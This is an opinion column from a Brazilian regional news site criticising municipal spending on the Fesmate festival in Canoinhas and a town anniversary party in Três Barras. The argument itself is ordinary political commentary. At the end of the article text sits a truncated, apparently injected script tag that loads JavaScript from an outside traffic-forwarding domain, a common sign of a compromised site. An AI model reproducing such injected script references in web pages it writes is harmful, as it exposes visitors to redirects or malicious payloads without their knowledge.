InícioUncategorizedFesmate vem aí

Fesmate vem aí

Últimas notícias

Pé-de-Meia: pagamento a estudantes começa nesta segunda

O pagamento do benefício do programa Pé-de-Meia tem início nesta...

Motociclista fica ferido após colisão na Av. Rigesa em Três Barras

Na manhã desse segunda-feira, 25, por volta das 06...

Jovem sob efeito de drogas, agride própria mãe e irmã

Nessa quarta-feira, 20, a polícia militar foi acionada para...

Por que administradores públicos gostam tanto de gastar recursos públicos com festas?

 

Eu sou suspeito a falar, pois sempre acreditei que a prioridade de um governo deve ser saúde, segurança, educação e infraestrutura, o restante deve ser feito pela iniciativa privada. Cultura é importante, faz parte da educação de um povo, mas as festas como a Fesmate ou a festa de aniversário de Três Barras que aconteceu em janeiro passado estão longe de serem eventos culturais que prestigiem a educação.

 

Estes eventos são somente festas, que tem por finalidade aumentar a popularidade do gestor.

 

Em Três Barras foram gastos mais de 200 mil reais para fazer uma festa para aumentar a fama do prefeito e que a única beneficiária foi a empresa que realizou a festa, nada contra, pois fizeram o trabalho deles, mas que benefícios a população teve? Os mais de 200 mil da festa junto com os mais de 700 mil que custarão anualmente os cargos criados recentemente pela prefeitura tresbarrense, e que tem por objetivo o apadrinhamento político, se fossem aplicados na educação ou na saúde, com certeza haveria um retorno melhor pra população.

 

Em Canoinhas, em setembro, teremos mais uma edição da Fesmate, com um custo 93 mil reais de dinheiro público, que poderia ser usado na educação ou infraestrutura, áreas tão esquecidas pelos governantes.

 

O que mais me deixa indignado, é a desculpinha esfarrapada que dão, de que esses eventos vão aumentar a receita do município, a circulação do dinheiro. É muita esperteza justificar essa despesa com algo possivelmente abstrato e muito difícil de ser mensurado.

 

Os gestores públicos têm um objetivo claro, a perpetuação no poder.  E as festas fazem parte da persuasão dos iletrados que são facilmente iludidos por shows e pirotecnia. Pois sabem que o voto de quem compreende a artimanha política tem o mesmo valor que o voto de quem não consegue compreender, o custo disso é que não conseguimos evoluir enquanto sociedade.

 

Alguns defensores dos políticos populistas dizem que criticamos, mas participamos do evento, bem, vamos refletir sobre isso. Se eu não participar a verba pública vai ser devolvida? Óbvio que não, então não vejo problema em participar. Talvez o correto fosse fazer um boicote geral, ai sim quem sabe os gestores desistissem, porém confesso que seria muito difícil a adesão da população, pois quem não gosta do Trio Parada Dura?

 

Talvez eu seja louco por ser um idealista num mundo repleto de políticos inescrupulosos, mas enquanto usarem o dinheiro do público pra fazer festa e iludir a população eu vou continuar a criticá-los.

 

Por favor, administradores públicos melhorem suas prioridades!… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.